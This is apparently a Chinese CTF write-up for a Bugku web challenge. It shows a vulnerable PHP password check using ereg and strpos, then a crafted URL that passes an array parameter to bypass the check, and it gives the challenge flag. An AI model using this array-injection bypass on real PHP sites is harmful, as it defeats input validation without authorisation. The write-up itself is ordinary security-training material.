数组返回NULL绕过

数组返回NULL绕过

数组返回NULL绕过

50

http://123.206.87.240:9009/19.php

<?php
$flag = "flag";

if (isset (_GET['password'])) { if (ereg ("^[a-zA-Z0-9]+", _GET['password']) === FALSE) echo 'You password must be alphanumeric'; else if (strpos (_GET['password'], '--') !== FALSE)
die('Flag: ' . $flag);
else
echo 'Invalid password';
}
?>

1.php不能处理数组

根据 if (strpos ($_GET['password'], '--') !== FALSE)

知道password一定有'--'

开始构造 %2d 但是过不了,

根据题目暗示和php特性

可以传一个数组绕过判断

http://123.206.87.240:9009/19.php?password[]=sad%2d%2d

Flag: flag{ctf-bugku-ad-2131212}

参考 strpos()

strpos() 函数查找字符串在另一字符串中第一次出现的位置。

注释:strpos() 函数对大小写敏感。

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • CTF中Web题目的常见题型及解题姿势
    想写这个想了很久了,但一直觉得自己的知识不足,于是一直没有写。后来觉得至少还是要边学边写才好,于是就有了这篇总结。...
    NoelleMu阅读 37,211评论 0 21
  • Bugku-CTF题解WEB部分
    去训练一下基础! Bugku地址:https://ctf.bugku.com/challenges 0x01 we...
    DYBOY阅读 4,929评论 0 2
  • BugKu-wp
    前两天无意间翻到一个CTF平台--BugKu,记下wp WEB 1.Web2 查看源代码即可得到flag 2.计算...
    BerL1n阅读 3,813评论 0 1
  • web ctf 学习 2018-11-28
    web2 听说聪明的人都能找到答案http://123.206.87.240:8002/web2/ 点开后发现很多...
    Emily0917阅读 1,021评论 0 1
  • Bugku CTF记录
    前言: 此文用于记录做BugkuCTF时遇到的知识,主要为了巩固和查阅。 记录各种知识 1.stripos(字符串...
    煊奕阅读 1,937评论 0 4